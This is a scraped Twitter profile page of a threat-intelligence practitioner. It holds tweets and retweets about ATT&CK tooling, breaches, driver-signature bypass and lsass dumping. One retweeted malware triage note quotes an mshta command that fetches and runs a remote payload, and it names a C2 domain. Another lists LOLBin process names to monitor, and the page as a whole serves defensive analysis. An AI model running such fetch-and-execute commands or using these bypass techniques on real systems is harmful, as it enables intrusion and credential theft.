Nader Shalabi

@nader_shalabi

Manager, . Following the digital [chaos] and threats landscape. My opinions are my own. /

Joined: April 2013.

Tweets


  1. Pinned tweet
    27 May 2019

    Pushed new version of ATT&CK View: -New ATT&CK content -New ATOMIC Red Team content -ATT&CK Data Models Updated -Uploaded an XML representation of the original ATT&CK JSON content -UI enhancements and bug fixes

  2. Retweeted
    12 hours ago

    BREAKING: Twitter says a suspected state-sponsored actor used its API to match usernames to phone numbers - Attack took place on December 24, 2019 - Twitter said attack came from IPs in Iran, Israel, and Malaysia

  3. Retweeted

    To the person who figured out my honeypot is a honeypot could you please stop putting the picture of Pooh bear with a jar of honey on it? It's like this person's life mission, I've blocked him on: - Client - IPs (now on Tor ffs) - The image (he just edits 1 pixel every time...)

  4. Retweeted
    2 Feb

    I added a script to generate the PDF & archive for my Exam Report Template in Markdown, as I saw a lot of people were creating their own scripts.

  5. Retweeted
    2 Feb

    KDU, Kernel Driver Utility - driver loader (and not only) bypassing Windows x64 Driver Signature Enforcement with support of various "functionality" providers - including Unwinder's RTCore,

  6. Retweeted
    29 Jan

    I made a goose that destroys your computer Download it free here:

  7. Retweeted
    1 Feb

    Some essential process execution/cmd lines to monitor for initial access/persist. powershell, cmd, rundll32, control, wscript, javaw, csc, regsvr32, reg, certutil, bitsadmin, schtasks, wmic, eqnedt32, msiexec, cmstp, mshta, hh, curl, installutil, regsvcs/regasm, at, msbuild, sc, cscript, msxsl, runonce

  8. Retweeted
    30 Jan

    in-memory traces of ppldump, exploiting zam64.sys vulndriver to dump lsass memory, cool stuff. sysmon will show a generic\noisy calltrace so detection chances here are low, if combined with lsass loading dbgcore.dll it may work.

  9. Retweeted
    30 Jan

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

  10. Retweeted
    29 Jan

    Need a SOC Reference Architecture? Check out this one we put together to show how Microsoft technology integrates into a SOC. Slide 73 of Azure Security Compass -

  11. Retweeted
    28 Jan

    network protocols

  12. Retweeted
    28 Jan

    New Blog Post from on Azure. Ryan discusses Azure and Azure AD's components, reviews some of the attacks, and releases PowerZure to help understand the attacks. Link: PowerZure:

  13. 28 Jan

    "JavaScript Libraries Are Almost Never Updated Once Installed"

  14. Retweeted
    27 Jan

    Amazing: a termite track (top) and an ant track (bottom) • each travelling insect is protected by its own column of soldiers, no fights necessary | 📹 via Mehdi Moussaid

  15. Retweeted
    27 Jan

    sLoad, the PowerShell-based Trojan downloader notable for its almost exclusive use of the Background Intelligent Transfer Service (BITS) for malicious activities, has launched version 2.0. Read about what's changed in our new blog:

  16. Retweeted
    27 Jan

    Have you analysed a new online threat? Know a new way to defend against such threats? Are you tasked with securing systems & fending off attacks? The Call for Papers for is open and we want to hear from you! VB2020: 30 Sept - 2 Oct, Dublin, Ireland

  17. Retweeted
    25 Jan

    I came to know that the 's hex editor is unbearable in the dark mode, so I fixed it. New release: 0.4.0.1 is out:

  18. Retweeted

    diversity is good

    chinese tang dynasty art version of woman yelling at cat meme
    egyptian hieroglyph art version of woman yelling at cat meme
    japanese woodblock art version of woman yelling at cat meme
  19. Retweeted
    24 Jan

    Our malware hunting service is now live. We continue to develop with our team. |

  20. Retweeted
    22 Jan

    Here is the link to the SpecterOps Adversary Tactics: PowerShell course material: Enjoy! For information about our current training offerings, information can be found here: (4/4)

  21. 22 Jan

    This is my favorite thing now, looking at document submissions! 🤦‍♂️
